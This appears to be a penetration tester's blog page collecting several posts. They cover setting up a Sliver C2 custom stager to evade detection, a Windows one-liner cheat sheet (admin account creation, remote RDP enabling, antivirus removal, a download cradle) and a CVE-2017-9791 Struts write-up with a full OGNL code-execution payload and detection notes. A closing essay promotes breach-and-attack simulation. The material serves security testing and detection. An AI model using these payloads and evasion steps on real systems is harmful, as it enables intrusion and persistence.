Categories
post exploitation

Custom Sliver Stager

First all props go to Dominic doing all the hard work and if you want to know the nitty gritty plus different ways of getting custom stagers up and running go check out his write up.

https://dominicbreuker.com/post/learning_sliver_c2_06_stagers/

My experience is that custom stagers can help evade automated detection mechanisms but realizing it’s always a cat and mouse game these are just the steps that have worked for me as of this write up.

Sliver instructions within Kali

apt-get install sliver
sliver-server
profiles new --http IP:80 --format shellcode name
stage-listener --url http://IP:80 --profile name

Above the IP is the C2 server / Kali IP address and the ‘name’ refers to the unique name you assign it on the command line. Once that’s done then head over to your windows target and compile the stager following the simple instructions below.

https://github.com/travisaltman/sliver-c-stager/blob/main/README.md

After executing the compiled exe you should hopefully have a session within Sliver to continue your post exploitation goodness.

Categories
windows

Pentesting one liner Windows Commands

Remotely determine logged in user

wmic /node:remotecomputer computersystem get username

List running processes

wmic process list brief

Kill a process

wmic process where name="cmd.exe" delete

Determine open shares

net share
wmic share list brief

Determine IP address

ipconfig

Get a new IP address

ipconfig /release
ipconfig /renew

Remotely display machine’s MAC address

wmic /node:machinename nic get macaddress

Remotely list running processes every second

wmic /node:machinename process list brief /every:1

Remotely display System Info

wmic /node:machinename computersystem list full

Disk drive information

wmic diskdrive list full
wmic partition list full

Bios info

wmic bios list full

List all patches

wmic qfe

Look for a particular patch

wmic qfe where hotfixid="KB958644" list full

Remotely List Local Enabled Accounts

wmic /node:machinename USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name

Start a service remotely

wmic /node:machinename 4 service lanmanserver CALL Startservice
sc \\machinename start lanmanserver

List services

wmic service list brief
sc \\machinename query

Disable startup service

sc config example disabled

List user accounts

wmic useraccount list brief

Enable RDP remotely

wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections=“0” call SetAllowTSConnections “1”

List number of times a user logged on

wmic netlogin where (name like "%adm%") get numberoflogons

Query active RDP sessions

qwinsta /server:192.168.1.1

Remove active RDP session ID 2

rwinsta /server:192.168.1.1 2

Remotely query registry for last logged in user

reg query "\\computername\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName

List all computers in domain “blah”

dsquery computer "OU=example,DC=blah" -o rdn -limit 6000 > output.txt

Reboot

shutdown /r /t 0

Shutdown

shutdown /s /t 0

Remotely reboot machine

shutdown /m \\192.168.1.1 /r /t 0 /f

Copy entire folder and its contents from a remote source to local machine

xcopy /s \\remotecomputer\directory c:\local

Find location of file with string “blah” in file name

dir c:\ /s /b | find "blah"

Spawn a new command prompt

start cmd

Determine name of a machine with known IP

nbtstat -A 192.168.1.1

Find directory named blah

dir c:\ /s /b /ad | find "blah"

Command line history

F7

Determine the current user (aka whoami Linux equivalent)

echo %USERNAME%

Determine who is apart of the administrators group

net localgroup administrators

Add a user where travis is the username and password is blah

net user travis blah /add

Add user travis to administrators group

net localgroup administrators travis /add

List user accounts

net user

Map a network share with a given drive letter of T:

net use T: \\serverNameOrIP\shareName

List network connections and the programs that are making those connections

netstat -nba

Display contents of file text.txt

type text.txt

Edit contents of file text.txt

edit text.txt

Determine PC name

hostname

Run cmd.exe as administrator user

runas /user:administrator cmd

Uninstall a program, Symantec in this case ;-}

wmic product where “description=’Symantec’ ” uninstall

Determine whether a system is 32 or 64 bit

wmic cpu get DataWidth /format:list

Powershell one liner download file

(new-object System.Net.WebClient).Downloadfile("http://example.com/file.txt", "C:\Users\Travis\file.txt")

Information about OS version and other useful system information

systeminformation

Startup applications

wmic startup get caption,command

Recursively unzip all zip folders, you’ll need unzip.exe for this

FOR /R %a (*.zip) do unzip -d unzipDir "%a"

Query status of Windows Defender

sc query WinDefend

Powershell one liner to determine if Windows Defender and other services are running

Get-MpComputerStatus

Validate credentials against Active Directory

net use \\%userdnsdomain% /user:domain\user *

Delete net use connection

net use \\%userdnsdomain% /del
Categories
penetration testing

CVE-2017-9791 exploit details

Was looking back through some of my notes and came across this write up I did for a Struts exploit. Nothing crazy but what I liked about the notes I captured was around detection on what defenders could have alerted on when this exploit came out. Enjoy!

Confirmed publicly released exploits of CVE-2017-9791 do allow remote code execution with privileges of the web server.  In recent vulnerabilities involving Struts and others it appears that most business functions follow the best practice of running the web server without admin or root privileges but of course this needs to be confirmed on a case by case basis.

The vulnerable functionality within Struts 2.3.X and below is a sample Struts application that comes bundled by default named struts2-showcase, this application is not installed by default so one would have to intentionally deploy this application.  Below is a screenshot showing it deployed.

Below is a screenshot of the vulnerable functionality within Showcase.

The URL to access this functionality is http://hostname.com/struts2-showcase/integration/editGangster.action, once there one can fill out the forms and submit the request to test the working example.  Once that request is submitted it goes to the server as a post request.

POST /struts2-showcase/integration/saveGangster.action

Knowing if these URLs exist is one way of determining if the underlying Struts system is vulnerable as Struts 2.5.X does not contain this functionality.  Struts 2.5.X will contain the struts2-showcase application but not the Struts1 plugin. In comparing the downloads of different Struts version only the ones with the “struts2-struts1-plugin” Jar file were vulnerable.

So if the vulnerable application isn’t deployed but you had access to the file system of the web server then checking for the struts2-struts1-plugin Jar file is another way of confirming if the underlying system could be exposed in the future.

We used publicly known techniques to confirm exploitation was possible, similar to a posting here https://github.com/nixawk/labs/issues/8.  Sending a specialized URL request with a proof of concept to execute the command whoami can be seen below.

The request has to be URL encoded but the complete translation is below.

POST /struts2-showcase/integration/saveGangster.action HTTP/1.0

Content-Length: 1187

Host: 192.168.142.216:8080

Content-Type: application/x-www-form-urlencoded

Connection: close

User-Agent: Python-urllib/2.7

name=%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’whoami’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}&age=1337&__cheackbox_bustedBefore=true&description=blah

Here is the exploit being ran from the command line via a python script.

If logging is enabled within Tomcat it will have the individual URL requests, in Windows these logs are located in c:\Program Files (x86)\Apache Software Foundation\Tomcat\logs with the name of the log being localhost_access_log.date.  A snippet of these logs are below with the last request being the saveGangster.action request.

192.168.142.216 – – [08/Jul/2017:20:03:51 -0400] “GET / HTTP/1.1” 200 11418

192.168.142.216 – admin [08/Jul/2017:20:03:53 -0400] “GET /manager/html HTTP/1.1” 200 12398

192.168.142.216 – admin [08/Jul/2017:20:04:40 -0400] “POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=817A45627CEDACBC2F98D9BF3B598839 HTTP/1.1” 200 14179

192.168.142.128 – admin [08/Jul/2017:20:04:55 -0400] “GET /manager/html HTTP/1.1” 200 14179

192.168.142.128 – – [08/Jul/2017:20:04:55 -0400] “GET /manager/images/tomcat.gif HTTP/1.1” 304 –

192.168.142.128 – – [08/Jul/2017:20:04:55 -0400] “GET /manager/images/asf-logo.svg HTTP/1.1” 304 –

192.168.142.128 – – [08/Jul/2017:20:05:00 -0400] “GET /struts2-showcase/index.action HTTP/1.1” 200 10870

192.168.142.128 – – [08/Jul/2017:20:05:00 -0400] “GET /struts2-showcase/struts/utils.js HTTP/1.1” 200 4730

192.168.142.128 – – [08/Jul/2017:20:05:07 -0400] “GET /struts2-showcase/integration/editGangster.action HTTP/1.1” 200 12001

192.168.142.128 – – [08/Jul/2017:20:05:07 -0400] “GET /struts2-showcase/struts/xhtml/styles.css HTTP/1.1” 200 1093

192.168.142.128 – – [08/Jul/2017:20:05:07 -0400] “GET /struts2-showcase/struts/utils.js HTTP/1.1” 200 4730

192.168.142.128 – – [08/Jul/2017:20:10:16 -0400] “POST /struts2-showcase/integration/saveGangster.action HTTP/1.1” 200 11408

This remote code execution exploit has been proven to work on Windows and *nix systems.  For detection purposes simply looking for the gangster.action in logs would be a great indicator of malicious activity but not the end all be all.  There are different styles of payloads that can be used to take advantage of this vulnerability so a combination of the gangster.action plus ONGL functionality plus OS style commands will be a better indicator of malicious activity.


Categories
Uncategorized

Hacking tutorial of the week (1/6/2020)

This guy doesn’t post a whole lot but the stuff he does post is spot on and nicely written. In this tutorial he gives a great introduction into out of band attacks. Goes over in detail how to pull off blind attacks leveraging SQL injection and command injection. Also before he dives into those examples he shows how to setup your environment for data ex-filtration leveraging those types of vulnerabilities.

Categories
Uncategorized

Why your organization should be doing Breach & Attack Simulations

Some would say what’s old is new again when it comes to a phrase like “breach and attack simulations”.  How is this different from vulnerability scanning, pentesting, or red teaming?  Really it’s more of a maturation of cyber security services so if your organization doesn’t currently employ a combination of vulnerability scanning, penetration testing, or red teaming then breach and attack simulations services should probably be lower on your list.

What is Breach & Attack Simulation (BAS)?

“It’s an automated  or semi-automated emulation of threat actors TTP’s (tactics, techniques, and procedures) against information systems within your organization’s environment to determine how effective your current controls would protect, detect, and defend those information systems from malicious users.”

Now there are various definitions out there but think that pretty much sums up the intent of having a service like this in place.  That may sound like what red teaming and penetration testing are meant to accomplish but they aren’t one to one and their objectives are completely different.  I’ve done this before and called it an “assumed compromise” so really it’s a play on that but calling out breach and attack simulation as a separate capability or service helps more clearly define the objective you’re going after.

So how do the services differ and what are the main goals of introducing something like an assumed compromise or breach simulation?  The quick breakdown on the differences below should help.

FeatureBASPentestingRed Teaming
ObjectiveControl and postureIdentify weaknessBolster Blue team
ConsistencyHigh: run exact same scenario every timeMedium: follows a framework but human drivenLow: depends up conditions
Attack ElementsMost if not all stagesUsually focused on recon & exploitationVaries but tends to be post exploitation

This break down should help delineate the services and as you’re trying to mature cyber security services within your organization and leverage the table above to highlight the benefit that a BAS would provide.  So as you’re making the case for BAS within your organization whether that’s additional head count to support the service or if it’s simply a service you’d like to introduce alongside other services the above table will point your leadership in the right direction but let’s dig deeper into the benefits of BAS.

Key Benefits of BAS

  1. Cost:  Spinning up resources to perform penetration testing or red teaming requires a lot of cycles.  Wing to wing penetration tests and red team assessments can last anywhere from 3 – 6 months and involve numerous resources.  Having a BAS solution is more cost effective as it eliminates the need for additional resources plus automates the task of pentesting and red teaming activities.
  2. Mimics larger set of TTP’s consistently:  Penetration Testing and Red Teaming usually only care about the end game and aren’t necessarily interested in testing the whole environment to whereas BAS will test across the board all the different scenarios that a threat actor might leverage.  This is key as red teams or pentesters may not run a particular scenario for a number of reasons but BAS would cover that and may find something others would miss.
  3. Agile:  Similar to the ease of launching a vulnerability scanner against a particular target leveraging a BAS solution one should easily be able to kick off a simulation against an environment.
  4. Evaluation:  Having the ability to run the simulations in almost any environment is very handy.  As most know the attack surface across the organization varies and if it were all the same then that’d be a whole lot easier to defend but we don’t live in rainbow land.  Whether it’s running BAS on a more frequent basis to test your organization’s core detection capabilities or if it’s testing it against a business function within your organization that has customized applications and configurations BAS allows you to quickly and easily evaluate your risk posture.

Beyond some of the key benefits and the differences in technologies or services BAS will afford your organization what you really want from any new offering is what it’s going to achieve.  I’ve defined and highlighted features of BAS but the main intent is to discover any cyber security controls that may be deficient in your environment so to that point what are some of the main features that BAS will employ to help identify those gaps?

  • Network assessment:  The multiple attack simulations will test all the various NIDS and alerts the SOC has setup to see which ones are getting notified appropriately
  • Data exfiltration:  Will test various outbound techniques to see what controls are in place to defend against attackers getting information outside your boundaries
  • Lateral movement:  Can perform threat actor techniques for such things as privilege escalation and lateral movement within your network and information systems
  • Endpoint assessment:  Anti-virus, end point logging, and various other technologies are there to help alert or contain a threat so BAS has features to identify any gaps that might be missing with endpoint protections
  • Email gateway:  Hopefully your email gateway is working like it should to protect your organization but if not BAS has the capability to test some of the various techniques threat actors are leveraging (office docs, pdfs, .Net apps, etc.) to get passed your defenses

This list could go on for quite a while but these are some of the major categories where a BAS solution could test cyber security controls that are simply not working at all or not deployed effectively.

Anytime you’re trying to sell something new within your organization it’s probably best to think of all the questions someone will ask whether that’s being inquisitive about the solution or from a devils advocate perspective.  Leaving off the cost aspect as that will vary hopefully my points help to answer potential questions but there are some questions that you can ask to leadership or folks within your organization that might shed light on how a BAS solution can bridge those gaps.

Can we detect simple and complex threat actor attacks?

Can various types of malware be transferred through our boundaries?

Will our alerting logic correlate certain events?

How secure are we from all the various TTP’s?

Could we respond quickly enough (ransomware, worms, etc.)?

Can an attacker run code or bypass application controls undetected?

If we ran this in other environments would we see it?

These are just some of the questions that BAS is meant to help answer.  Others within your organization may be able to either fully or partially answer these questions but no one is 100% secure and as we play this cat & mouse game with adversaries that are looking to find any crack within our armor then leveraging something like a BAS solution will help us to answer those questions more definitively and better yet put a solution in place that can be better adapted as you move forward facing even greater challenges.

References

https://misti.com/infosec-insider/a-primer-on-breach-and-attack-simulations

https://www.gartner.com/doc/3875421/utilizing-breach-attack-simulation-tools